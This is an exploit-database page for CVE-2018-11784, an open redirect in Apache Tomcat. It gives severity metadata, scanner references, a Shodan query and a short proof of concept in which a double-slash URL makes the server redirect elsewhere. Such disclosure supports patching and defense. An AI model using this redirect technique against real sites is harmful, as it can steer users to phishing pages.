header-logo
Suggest Exploit
vendor:
Tomcat
by:
Central InfoSec
4,3
CVSS
MEDIUM
Open Redirect
601
CWE
Product Name: Tomcat
Affected Version From: Apache Tomcat 9.0.0.M1
Affected Version To: Apache Tomcat 7.0.90
Patch Exists: YES
Related CWE: CVE-2018-11784
CPE: a:apache:tomcat
Metasploit: https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/oracle-missing-cpu-oct-2019-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/debian-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/suse-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2018-11784/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp8-cve-2018-11784/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=118036https://www.infosecmatter.com/nessus-plugin-library/?id=118037https://www.infosecmatter.com/nessus-plugin-library/?id=130058https://www.infosecmatter.com/nessus-plugin-library/?id=124169https://www.infosecmatter.com/nessus-plugin-library/?id=124170https://www.infosecmatter.com/nessus-plugin-library/?id=122863https://www.infosecmatter.com/nessus-plugin-library/?id=122846https://www.infosecmatter.com/nessus-plugin-library/?id=125529https://www.infosecmatter.com/nessus-plugin-library/?id=127594https://www.infosecmatter.com/nessus-plugin-library/?id=118035
Tags: packetstorm,tomcat,redirect,cve,cve2018,apache
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Nuclei References: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@announce.tomcat.apache.orghttps://nvd.nist.gov/vuln/detail/CVE-2018-11784http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00030.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-07/msg00056.htmlhttp://packetstormsecurity.com/files/163456/Apache-Tomcat-9.0.0M1-Open-Redirect.html
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'title:"Apache Tomcat"', 'vendor': 'apache', 'product': 'tomcat'}
Platforms Tested: All
2018

Apache Tomcat 9.0.0.M1 – Open Redirect

Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input.

Mitigation:

Ensure that all URLs are properly validated and sanitized before being used in a redirect.
Source

Exploit-DB raw data:

# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect
# Date: 10/04/2018
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90
# CVE : CVE-2018-11784

# Proof of Concept:

# Identify a subfolder within your application
http://example.com/test/

# Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash
http://example.com//test

# Browse to the newly created URL and the application will perform a redirection
http://test/

Navigation

Suggest Exploit

Services By CQR